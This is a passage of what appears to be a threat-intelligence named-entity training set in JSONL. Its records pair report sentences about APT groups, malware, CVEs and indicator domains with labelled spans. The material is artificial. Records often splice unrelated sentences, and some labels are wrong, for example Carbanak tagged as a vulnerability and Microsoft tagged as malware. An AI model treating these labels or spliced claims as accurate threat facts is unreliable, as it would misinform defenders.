APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS ) mechanism to communicate with the C2 over . Notably , the main function contains logic flaws that cause it to only be able to connect to an MSSQL server and upload ( LIGHTWORK ) to it , before immediately attempting to clean itself up .", "spans": {"THREAT_ACTOR: APT33": [[429, 434]], "ORGANIZATION: aerospace": [[477, 486]], "ORGANIZATION: energy": [[491, 497]], "THREAT_ACTOR: threat actor": [[566, 578]], "TOOL: C2": [[643, 645], [781, 783]], "MALWARE: Remexi": [[673, 679]], "TOOL: Microsoft Background Intelligent Transfer Service": [[689, 738]], "TOOL: (BITS": [[739, 744]]}, "info": {"id": "cyberner_stix_train_002128", "source": "cyberner_stix_train"}} {"text": "The campaign we observed used four stages of PowerShell scripts without writing the the payloads to individual files .", "spans": {"TOOL: four stages of PowerShell scripts": [[30, 63]]}, "info": {"id": "cyberner_stix_train_002129", "source": "cyberner_stix_train"}} {"text": "It turns out that those smaller Trojans face serious problems trying to get root access on Android 4.4.4 and above , because a lot of vulnerabilities were patched in these versions . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . 
In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware .", "spans": {"SYSTEM: Android 4.4.4": [[91, 104]], "VULNERABILITY: CVE-2010-3962": [[197, 210]], "VULNERABILITY: CVE-2014-1776": [[253, 266]], "THREAT_ACTOR: APT34": [[304, 309]], "MALWARE: PowerShell-based backdoor": [[355, 380]], "MALWARE: POWRUNER": [[394, 402]], "MALWARE: BONDUPDATER": [[480, 491]]}, "info": {"id": "cyberner_stix_train_002130", "source": "cyberner_stix_train"}} {"text": "CTU researchers divided the threat intelligence about TG-3390 into two sections : strategic and tactical .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[54, 61]]}, "info": {"id": "cyberner_stix_train_002131", "source": "cyberner_stix_train"}} {"text": "Icons used for EventBot masqueraded as legitimate with these icons.application . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester . 
Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"MALWARE: EventBot": [[15, 23]], "TOOL: malware": [[129, 136]], "MALWARE: Bluetooth device harvester": [[170, 196]], "ORGANIZATION: French diplomat": [[233, 248]], "THREAT_ACTOR: actors": [[314, 320]]}, "info": {"id": "cyberner_stix_train_002132", "source": "cyberner_stix_train"}} {"text": "com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . Starting from those findings , Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant . In addition , Hack520 ’s tweets always show photos of the same animal , which is likely his pet pig .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[345, 354]], "THREAT_ACTOR: activity group": [[361, 375]], "ORGANIZATION: Microsoft": [[428, 437]], "TOOL: Wingbird": [[441, 449]], "ORGANIZATION: Cybaze-Yoroi ZLab team": [[482, 504]], "MALWARE: Pterodo": [[566, 573]]}, "info": {"id": "cyberner_stix_train_002133", "source": "cyberner_stix_train"}} {"text": "THE DUKES 7 YEARS OF RUSSIAN CYBER ESPIONAGE .", "spans": {"THREAT_ACTOR: DUKES": [[4, 9]]}, "info": {"id": "cyberner_stix_train_002134", "source": "cyberner_stix_train"}} {"text": "Extract current GPS coordinates of the phone . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . 
As soon as the victim double-clicks on the dropper , they are presented with the decoy document . We highly suspect the “ Pig network ” to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": {"TOOL: ProjectSauron": [[71, 84]], "SYSTEM: Pig network": [[426, 437]], "SYSTEM: bulletproof hosting service": [[468, 495]], "THREAT_ACTOR: Winnti group": [[540, 552]]}, "info": {"id": "cyberner_stix_train_002135", "source": "cyberner_stix_train"}} {"text": "Table 3 ( above ) summarizes the commands supported by the variants used in the attack against Ukrainian government organizations . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"ORGANIZATION: government organizations": [[105, 129]], "THREAT_ACTOR: APT32": [[210, 215]], "ORGANIZATION: governments": [[242, 253]], "ORGANIZATION: dissidents": [[278, 288]], "ORGANIZATION: journalists": [[293, 304]]}, "info": {"id": "cyberner_stix_train_002136", "source": "cyberner_stix_train"}} {"text": "spear phishing : analytics-google.org .", "spans": {"URL: analytics-google.org": [[17, 37]]}, "info": {"id": "cyberner_stix_train_002137", "source": "cyberner_stix_train"}} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . the United Kingdom had data stolen by members of Emissary Panda .", "spans": {"THREAT_ACTOR: Patchwork": [[10, 19]], "MALWARE: MS PowerPoint document": [[28, 50]], "VULNERABILITY: CVE-2014-6352": [[76, 89]], "THREAT_ACTOR: Emissary Panda": [[141, 155]]}, "info": {"id": "cyberner_stix_train_002138", "source": "cyberner_stix_train"}} {"text": "Below is a list of the payloads used by the Skygofree implant in the second and third stages . OceanLotus’ targets are global . 
Suckfly is a China based threat group that has been active since at least 2014 .", "spans": {"MALWARE: Skygofree": [[44, 53]], "THREAT_ACTOR: OceanLotus’": [[95, 106]], "THREAT_ACTOR: Suckfly": [[128, 135]]}, "info": {"id": "cyberner_stix_train_002139", "source": "cyberner_stix_train"}} {"text": "and were signed using the name of an engineer who appears to hold equity in Connexxa . Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . The MuddyWater campaign was first sighted in 2017 when it targeted the Saudi government using an attack involving PowerShell scripts deployed via Microsoft Office Word macro .", "spans": {"ORGANIZATION: Connexxa": [[76, 84]], "THREAT_ACTOR: cybercrime gang": [[104, 119]], "ORGANIZATION: banks": [[145, 150]], "ORGANIZATION: e-payment": [[153, 162]], "ORGANIZATION: financial institutions": [[175, 197]], "VULNERABILITY: Carbanak": [[247, 255]], "TOOL: Cobalt": [[260, 266]], "ORGANIZATION: government": [[346, 356]], "MALWARE: PowerShell scripts": [[383, 401]], "MALWARE: Microsoft": [[415, 424]], "MALWARE: Office Word": [[425, 436]]}, "info": {"id": "cyberner_stix_train_002140", "source": "cyberner_stix_train"}} {"text": "Today , the number of deployed IoT devices outnumber the population of personal computers and mobile phones , combined .", "spans": {"TOOL: IoT": [[31, 34]], "TOOL: computers": [[80, 89]], "TOOL: mobile phones": [[94, 107]]}, "info": {"id": "cyberner_stix_train_002141", "source": "cyberner_stix_train"}} {"text": "The attacks described here begin with a banking credential phishing scheme , followed by an attempt to trick the victim into installing Marcher , and finally with attempts to steal credit card information by the banking Trojan itself . 
Just months after the APT32 watering hole activity against ASEAN-related websites was observed in Fall 2017 , this new activity clearly indicates the association (ASEAN) clearly remains a priority collection target in the region . Elderwood is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora .", "spans": {"MALWARE: Marcher": [[136, 143]], "THREAT_ACTOR: APT32": [[258, 263]], "THREAT_ACTOR: Elderwood": [[467, 476]], "ORGANIZATION: Google": [[567, 573]]}, "info": {"id": "cyberner_stix_train_002142", "source": "cyberner_stix_train"}} {"text": "The ultimate goal of this threat is to mine Monero cryptocurrency in compromised Linux machines . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": {"THREAT_ACTOR: Wild Neutron": [[98, 110]], "TOOL: Java": [[141, 145]], "VULNERABILITY: zero-day": [[146, 154]], "VULNERABILITY: exploit": [[155, 162]]}, "info": {"id": "cyberner_stix_train_002143", "source": "cyberner_stix_train"}} {"text": "] net svc [ . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware . About four months after The New York Times publicized an attack on its network , the attackers behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families . 
We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": {"TOOL: KeyBoy": [[158, 164]], "TOOL: string obfuscation routine": [[179, 205]], "ORGANIZATION: New York Times": [[311, 325]], "FILEPATH: Backdoor.APT.Aumlib": [[434, 453]], "FILEPATH: Backdoor.APT.Ixeshe": [[458, 477]]}, "info": {"id": "cyberner_stix_train_002144", "source": "cyberner_stix_train"}} {"text": "LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: LATINUM": [[0, 7]], "TOOL: self-deleting malicious components": [[69, 103]], "TOOL: server side logic": [[118, 135]], "VULNERABILITY: exploit": [[276, 283]], "VULNERABILITY: CVE-2012-0158": [[284, 297]], "MALWARE: NetTraveler Trojan": [[309, 327]]}, "info": {"id": "cyberner_stix_train_002145", "source": "cyberner_stix_train"}} {"text": "Like CozyDuke , OnionDuke appears to have been designed with versatility in mind , and takes a similarly modular platform approach .", "spans": {"MALWARE: CozyDuke": [[5, 13]], "MALWARE: OnionDuke": [[16, 25]]}, "info": {"id": "cyberner_stix_train_002146", "source": "cyberner_stix_train"}} {"text": "Noting who is targeted , with what malware , and with what types of lures provide clues with which organizations can improve their security posture .", "spans": {}, "info": {"id": "cyberner_stix_train_002147", "source": "cyberner_stix_train"}} {"text": "In the wild , these are only distributed as a direct download from unofficial Web pages ( “ third-party ” app ) and not through legitimate app stores . 
Although the APT38 's primary targets appear to be Financial Exchange banks and other financial organizations , they have also Financial Exchange targeted countries ' media organizations with a focus on the financial sector . maturity level , There are more unused URLs in the script .", "spans": {"THREAT_ACTOR: APT38": [[165, 170]], "ORGANIZATION: Financial Exchange banks": [[203, 227]], "ORGANIZATION: financial organizations": [[238, 261]], "ORGANIZATION: media organizations": [[319, 338]], "ORGANIZATION: financial sector": [[359, 375]]}, "info": {"id": "cyberner_stix_train_002148", "source": "cyberner_stix_train"}} {"text": "if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE The timeline in Figure 2 shows that the Emissary Trojan was first created ( version 1.0 ) in May 2009 and quickly received an update that resulted in version 1.1 in June 2009 . Is it simply financial gain? Are there any reasons why the three affected products are from Asian developers and for the Asian market? Do these attackers use a botnet as part of a larger espionage operation? ESET products detect this threat as Win32/HackedApp.Winnti.A , Win32/HackedApp.Winnti.B , the payload as Win32/Winnti.AG , and the second stage as Win64/Winnti.BN . The United States government also threatened to step in when it looked like a U.S. 
company was going to purchase NSO Group , an infamous Israeli maker of the Pegasus spyware .", "spans": {"TOOL: Emissary Trojan": [[458, 473]], "ORGANIZATION: ESET": [[803, 807]], "FILEPATH: Win32/HackedApp.Winnti.A": [[839, 863]], "FILEPATH: Win32/HackedApp.Winnti.B": [[866, 890]], "FILEPATH: Win32/Winnti.AG": [[908, 923]], "FILEPATH: Win64/Winnti.BN": [[950, 965]], "ORGANIZATION: The United States government": [[968, 996]], "ORGANIZATION: a U.S. company": [[1044, 1058]], "MALWARE: the Pegasus spyware": [[1122, 1141]]}, "info": {"id": "cyberner_stix_train_002149", "source": "cyberner_stix_train"}} {"text": "APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences . In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "ORGANIZATION: MSPs": [[75, 79]], "ORGANIZATION: information technology": [[235, 257]], "ORGANIZATION: IT": [[260, 262]]}, "info": {"id": "cyberner_stix_train_002150", "source": "cyberner_stix_train"}} {"text": "The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: .WCRY extension": [[50, 65]], "ORGANIZATION: CSIS": [[221, 225]], "MALWARE: Carbanak": [[259, 267]], "ORGANIZATION: customers": [[297, 306]]}, "info": {"id": "cyberner_stix_train_002151", "source": "cyberner_stix_train"}} {"text": "Besides providing the ability to execute arbitrary commands on the target system , these utilities normally don’t raise suspicion as they are commonly whitelisted by Antivirus and other commercial security software .", "spans": {}, "info": {"id": "cyberner_stix_train_002152", "source": "cyberner_stix_train"}} {"text": "But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) .", "spans": {"TOOL: ASPXTool": [[46, 54]], "TOOL: OwaAuth credential stealing tool": [[189, 221]], "TOOL: Web shell": [[226, 235]], "ORGANIZATION: bank": [[421, 425]]}, "info": {"id": "cyberner_stix_train_002153", "source": "cyberner_stix_train"}} {"text": "The most popular member of the Android/AdDisplay.Ashas family on Google Play was “ Video downloader master ” with over five million downloads Ashas functionality All the apps provide the functionality they promise , besides working as adware . In mid-2018 , Kaspersky's report on Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . 
The malware checks if a file used on a previous version of KONNI is available on the system .", "spans": {"MALWARE: Android/AdDisplay.Ashas family": [[31, 61]], "SYSTEM: Google Play": [[65, 76]], "MALWARE: Ashas": [[142, 147]], "ORGANIZATION: Kaspersky's": [[258, 269]], "THREAT_ACTOR: Lazarus": [[330, 337]], "MALWARE: KONNI": [[440, 445]]}, "info": {"id": "cyberner_stix_train_002154", "source": "cyberner_stix_train"}} {"text": "Most of them use the same mutex structure , share the same fake icon and unique metadata details , file writes , registry operations , and fake common program metadata , as seen in DustySky samples .", "spans": {"TOOL: mutex": [[26, 31]]}, "info": {"id": "cyberner_stix_train_002155", "source": "cyberner_stix_train"}} {"text": "Call an attacker-specified number Uninstall apps Check if a device is rooted Hide its icon Retrieve list of files on external storage If running on a Huawei device it will attempt to add itself to the protected list of apps able to run with the screen off Encrypts some exfiltrated data Desert Scorpion 's second stage masquerades as a generic \" settings '' application . We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 . Elfin continues to be focused heavily on Saudi Arabia , which accounted for 42 percent of attacks observed by Symantec since the beginning of 2016 . 
Tortoiseshell Facebook Attack Campaign", "spans": {"MALWARE: Desert Scorpion": [[287, 302]], "ORGANIZATION: banks": [[437, 442]], "THREAT_ACTOR: Lazarus": [[446, 453]], "THREAT_ACTOR: attacker": [[549, 557]], "THREAT_ACTOR: Elfin": [[635, 640]], "ORGANIZATION: Symantec": [[745, 753]]}, "info": {"id": "cyberner_stix_train_002156", "source": "cyberner_stix_train"}} {"text": "COMMON FEATURES Permissions When installed , EventBot requests the following permissions on the device : SYSTEM_ALERT_WINDOW - allow the app to create windows that are shown on top of other apps . The contents of the decoy PDF is a job descriptions with the South Korean Coast Guard . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented .", "spans": {"MALWARE: EventBot": [[45, 53]], "MALWARE: the decoy PDF": [[213, 226]], "ORGANIZATION: Coast Guard": [[271, 282]], "MALWARE: Elise sample": [[339, 351]]}, "info": {"id": "cyberner_stix_train_002157", "source": "cyberner_stix_train"}} {"text": "Finally , it is worth noting that while most of the compilation timestamps for CosmicDuke samples appear to be authentic , we are aware of a few cases of them being forged .", "spans": {"MALWARE: CosmicDuke": [[79, 89]]}, "info": {"id": "cyberner_stix_train_002158", "source": "cyberner_stix_train"}} {"text": "The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal . 
In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand .", "spans": {"THREAT_ACTOR: attacker’s": [[55, 65]], "ORGANIZATION: FireEye": [[137, 144]], "TOOL: ATM": [[168, 171]], "MALWARE: malware": [[172, 179]], "MALWARE: RIPPER": [[200, 206]], "ORGANIZATION: banks": [[318, 323]]}, "info": {"id": "cyberner_stix_train_002159", "source": "cyberner_stix_train"}} {"text": "android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": {"THREAT_ACTOR: APT41": [[108, 113]], "ORGANIZATION: Department of Homeland Security": [[264, 295]], "ORGANIZATION: DHS": [[298, 301]], "ORGANIZATION: FBI": [[346, 349]], "ORGANIZATION: Russian government": [[369, 387]], "ORGANIZATION: military": [[493, 501]], "ORGANIZATION: government": [[506, 516]]}, "info": {"id": "cyberner_stix_train_002160", "source": "cyberner_stix_train"}} {"text": "the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft 
Office process was used as exploit vector ) : Installation process under In early 2017 , Mandiant responded to an incident involving APT35 targeting an energy company . The decryption is performed with the use of the StreamTransformationFilter class with the StreamTransformation cipher set to AES CBC decryption mode . The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"SYSTEM: Microsoft Office": [[498, 514]], "ORGANIZATION: Mandiant": [[597, 605]], "THREAT_ACTOR: APT35": [[641, 646]], "ORGANIZATION: energy company": [[660, 674]], "TOOL: StreamTransformationFilter": [[725, 751]], "TOOL: StreamTransformation": [[767, 787]], "ORGANIZATION: Talos": [[848, 853]], "ORGANIZATION: Open Babel": [[884, 894]]}, "info": {"id": "cyberner_stix_train_002161", "source": "cyberner_stix_train"}} {"text": "It is a toolkit similar to Metasploit or PowerShell Empire and is freely available to anyone on Github .", "spans": {"TOOL: Metasploit": [[27, 37]], "TOOL: PowerShell": [[41, 51]], "TOOL: Empire": [[52, 58]], "TOOL: Github": [[96, 102]]}, "info": {"id": "cyberner_stix_train_002162", "source": "cyberner_stix_train"}} {"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . 
WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet .", "spans": {"MALWARE: document": [[7, 15]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "VULNERABILITY: CVE-2013-3906": [[80, 93]], "VULNERABILITY: CVE-2014-1761": [[97, 110]], "VULNERABILITY: EternalBlue": [[211, 222]], "VULNERABILITY: exploit": [[223, 230]], "SYSTEM: Windows": [[270, 277]], "VULNERABILITY: CVE-2017-0144": [[278, 291]], "VULNERABILITY: CVE-2017-0145": [[296, 309]]}, "info": {"id": "cyberner_stix_train_002163", "source": "cyberner_stix_train"}} {"text": "Please note that these unblocking instructions are based on an analysis of the current version of Rotexy and have been tested on it . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . 
Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States .", "spans": {"MALWARE: Rotexy": [[98, 104]], "MALWARE: Acunetix Web Vulnerability Scanner": [[168, 202]], "THREAT_ACTOR: Leviathan": [[317, 326]], "ORGANIZATION: maritime industry": [[353, 370]], "ORGANIZATION: research institutes": [[377, 396]], "ORGANIZATION: academic organizations": [[399, 421]], "ORGANIZATION: private firms": [[428, 441]]}, "info": {"id": "cyberner_stix_train_002164", "source": "cyberner_stix_train"}} {"text": "This tells us that it is possible either the threat actors or at least one of the targets is located in that area .", "spans": {}, "info": {"id": "cyberner_stix_train_002165", "source": "cyberner_stix_train"}} {"text": "Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals . If it is not in Switzerland , the traffic will proceed as normal .", "spans": {"TOOL: SWCs": [[34, 38]], "THREAT_ACTOR: TG-3390": [[41, 48]]}, "info": {"id": "cyberner_stix_train_002166", "source": "cyberner_stix_train"}} {"text": "The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": {"MALWARE: backdoor": [[4, 12]], "FILEPATH: CONFUCIUS_A": [[132, 143]], "MALWARE: SNEEPY": [[262, 268]], "MALWARE: ByeByeShell": [[275, 286]], "ORGANIZATION: Rapid7": [[307, 313]]}, "info": {"id": "cyberner_stix_train_002167", "source": "cyberner_stix_train"}} {"text": "Since TrickMo ’ s HTTP traffic with its C & C server is not encrypted , it can easily be tampered with . 
This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple Exfiltration methods .", "spans": {"TOOL: MiniDuke": [[150, 158]], "TOOL: CosmicDuke": [[161, 171]], "TOOL: OnionDuke": [[174, 183]], "TOOL: CozyDuke": [[186, 194]], "THREAT_ACTOR: Dukes": [[209, 214]], "THREAT_ACTOR: cyberespionage group": [[267, 287]], "MALWARE: ProjectSauron": [[476, 489]]}, "info": {"id": "cyberner_stix_train_002168", "source": "cyberner_stix_train"}} {"text": "While Google implemented multiple mechanisms , like two-factor-authentication , to prevent hackers from compromising Google accounts , a stolen authorization token bypasses this mechanism and allows hackers the desired access as the user is perceived as already logged in . The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . 
If the setl is always sub-instruction during the optimization , These groups commonly share infrastructure to complete their actions on objectives .", "spans": {"ORGANIZATION: Google": [[6, 12], [117, 123]], "THREAT_ACTOR: group": [[278, 283]], "VULNERABILITY: zero-day vulnerability": [[339, 361]]}, "info": {"id": "cyberner_stix_train_002169", "source": "cyberner_stix_train"}} {"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": {"ORGANIZATION: CTU": [[28, 31]], "THREAT_ACTOR: TG-3390": [[56, 63]], "ORGANIZATION: political intelligence": [[165, 187]], "ORGANIZATION: governments": [[193, 204]], "ORGANIZATION: Dragos": [[216, 222]]}, "info": {"id": "cyberner_stix_train_002170", "source": "cyberner_stix_train"}} {"text": "Along with the subsequent Process Activity using the newly built PowerShell command , which aligns with what was commented out of the first sample analyzed .", "spans": {"TOOL: PowerShell": [[65, 75]]}, "info": {"id": "cyberner_stix_train_002171", "source": "cyberner_stix_train"}} {"text": "Google Apps allows organizations to use Gmail as their organizational mail solution .", "spans": {"ORGANIZATION: Google": [[0, 6]], "TOOL: Gmail": [[40, 45]]}, "info": {"id": "cyberner_stix_train_002172", "source": "cyberner_stix_train"}} {"text": "It was configured to activate via SMS sent from a Czech Republic number . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation . and green-colored flattened blocks . 
It is only when evaluating indicators of attack in the big picture , that the patterns of data collection and attempts to access the network start resembling an adversary with malicious intent .", "spans": {"VULNERABILITY: Carbanak": [[106, 114]], "VULNERABILITY: CVE-2013-3660": [[283, 296]], "THREAT_ACTOR: adversary with malicious intent": [[530, 561]]}, "info": {"id": "cyberner_stix_train_002173", "source": "cyberner_stix_train"}} {"text": "Take note of the following best practices to prevent this threat from getting in your device : Disable app installations from unknown , third-party sources . However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . some blocks are deleted by the optimization after defeating opaque predicates , PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": {"THREAT_ACTOR: Cleaver": [[196, 203]], "THREAT_ACTOR: Cyber Army": [[257, 267]], "THREAT_ACTOR: Ashiyane": [[282, 290]], "ORGANIZATION: Syrian Electronic Army": [[313, 335]], "ORGANIZATION: PBI Research Services": [[483, 504]]}, "info": {"id": "cyberner_stix_train_002174", "source": "cyberner_stix_train"}} {"text": "This delay means that a typical testing procedure , which takes less than 10 minutes , will not detect any unwanted behavior . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . 
The analysis shows us the evolution of KONNI over the last 3 years .", "spans": {"MALWARE: Word document": [[141, 154]], "MALWARE: Bienvenue_a_Sahaja_Yoga_Toulouse.doc": [[181, 217]], "MALWARE: Update.exe": [[249, 259]], "MALWARE: McUpdate.dll": [[272, 284]], "MALWARE: KONNI": [[328, 333]]}, "info": {"id": "cyberner_stix_train_002175", "source": "cyberner_stix_train"}} {"text": "“ We ’ re appreciative of both Check Point ’ s research and their partnership as we ’ ve worked together to understand these issues , ” said Adrian Ludwig , Google ’ s director of Android security . From November 2015 through the end of 2016 , APT38 was involved in at least nine separate compromises against banks . When a binary is loaded into IDA Pro , You 'll uncover why the US has seen a significant uptick in ransomware incidents across the board , especially in sectors like education .", "spans": {"ORGANIZATION: Check Point": [[31, 42]], "ORGANIZATION: Google": [[157, 163]], "SYSTEM: Android": [[180, 187]], "THREAT_ACTOR: APT38": [[244, 249]], "ORGANIZATION: banks": [[309, 314]], "TOOL: IDA Pro": [[346, 353]], "MALWARE: ransomware": [[416, 426]], "ORGANIZATION: education": [[483, 492]]}, "info": {"id": "cyberner_stix_train_002177", "source": "cyberner_stix_train"}} {"text": "Like the previous campaigns , these samples again involve a Microsoft Word document embedded with a malicious macro that is capable of executing PowerShell ( PS ) scripts leading to a backdoor payload . 
The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign .", "spans": {"MALWARE: Microsoft Word document": [[60, 83]]}, "info": {"id": "cyberner_stix_train_002178", "source": "cyberner_stix_train"}} {"text": "PlugX C2 server : ipsoftwarelabs.com .", "spans": {"MALWARE: PlugX": [[0, 5]], "TOOL: C2": [[6, 8]], "DOMAIN: ipsoftwarelabs.com": [[18, 36]]}, "info": {"id": "cyberner_stix_train_002179", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_002180", "source": "cyberner_stix_train"}} {"text": "This service , along with the API , was fully decommissioned in March 2019 . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent . The backdoor had the following properties : They manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration .", "spans": {}, "info": {"id": "cyberner_stix_train_002181", "source": "cyberner_stix_train"}} {"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . 
